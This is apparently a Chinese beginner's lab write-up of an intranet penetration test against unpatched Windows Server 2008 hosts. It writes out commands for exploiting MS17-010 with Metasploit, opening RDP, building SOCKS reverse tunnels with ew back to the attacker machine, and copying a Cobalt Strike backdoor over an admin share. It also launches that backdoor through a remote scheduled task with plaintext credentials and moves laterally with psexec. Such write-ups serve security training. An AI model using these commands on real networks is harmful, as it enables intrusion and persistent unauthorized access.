记一次小白的第一次内网渗透

访客 309 0
本文来源:今天的风好大好大啊

记一次小白的第一次内网渗透-第1张图片-网盾网络安全培训

网络拓扑

因为是一次简单的内网渗透,以上靶机均为Windows Server2008,并且没有装任何的补丁,所以全都可以使用ms17_010(永恒之蓝)进行攻击

首先直接使用msf拿到了内网跳板(10.7.233.212)的shell,并且为最高权限,

然后对它进行信息收集,首先查看IP,查看内网的网段是多少 输入命令ipconfig进行查看,然后得知内网跳板的内网IP为(192.168.174.128),

然后为了方便操作,直接在meterpreter界面中输入命令run getgui -e一键开启靶机的3389端口

,然后再输入arp -groute print对靶机进行信息收集,得到了靶机内网的另一台机子的IP地址为(192.168.174.129) 连接(192.168.174.128:3389);

CS生成了一个后缀为exe的后门,想用python -m http.server将后门通过浏览器的方式传输到靶机中,但是发现靶机并不能访问到web服务器.只能通过msf创建的shell来上传.

将后门成功上传到靶机中,运行,CS上线了靶机
记一次小白的第一次内网渗透-第2张图片-网盾网络安全培训然后进行对内网中的靶机进行渗透测试;首先想要想要进一步对内网进行渗透,那么就要配置代理服务,使得kali能够成功进入内网;

首先想到先用的代理方式是msf本身的代理方式,通过在跳板机中加入一条路由,然后切换到auxiliary/server/socks_proxy模块开启代理服务;

首先进入msf中内网跳板机(10.7.233.212

sock5:TCP与UDP,并支持安全认证方案;

这两种协议均不支持ping,因为ping是icmp; 因为一开始没发现,以为是代理没有成功,后面就换了ew来进行内网渗透,将Windows版本的ew上传至靶机,

切换到本机(攻击机->kali)输出命令ew -s rcsocks -l 1080 -e 8888将本地1080端口受到的代理转发至8888端口,然后切换到靶机上输入命令ew -s rssocks -d 10.7.33.234 -e 8888,

当本机ew界面弹出

记一次小白的第一次内网渗透-第3张图片-网盾网络安全培训

回显即为代理成功,因为可以使用ms17_010一路通关,就直接用代理开启msf然后继续对129进行渗透测试

使用命令proxychains msfconsole开启msf,是使用了sock5代理的,当然也可以在cs中直接设置代理,然后在msf中直接设置全局变量使用代理,

然后继续进行下一步的渗透测试,继续使用ms17_010模块,去对下一台靶机进行渗透测试,但是发现怎么样都没有将shell弹出来,以为是msf中shell传不出来,于是改用CS,生成后门,然后上传另一台靶机,

使用计划执行的命令来触发木马,先将生成好的木马上传至已经获得shell的跳板机,然后使用命令

copy C:\shell.exe \\192.16.174.129\C$将名为shell.exe的后门上传至内网跳板二上,然后再使用命令

schtasks /create /s 192.168.174.129 /u Administrator /p P@ssw0rd! /ru "SYSTEM" /tn test /sc DALIY /st 14:10 /tr C:\\windows\\temp\\shell.exe创建一个名为test的计划任务,在每天的14:10执行shell.exe文件,但是CS并没有相应机器上线 后来才察觉到,这个是不出网机器的渗透;于是改变策略,在CS上创建一个监听器,使用的payload是Beacon SMB,然后再CS中使用psexec进行横向移动,选择刚才创建的payload为Beacon SMB的监听器,选择10.7.233.212的会话,然后开始横向移动,然后就会得到一个IP地址为192.168.174.128的会话->记一次小白的第一次内网渗透-第4张图片-网盾网络安全培训然后用这个会话生成一个监听器,选中中转模块的listenr,生成一个监听器,然后用监听器生成一个后门上传并允许就有一个新的会话。

标签: 渗透测试 web安全 内网渗透 木马 网络安全技术

发表评论 (已有0条评论)

还木有评论哦,快来抢沙发吧~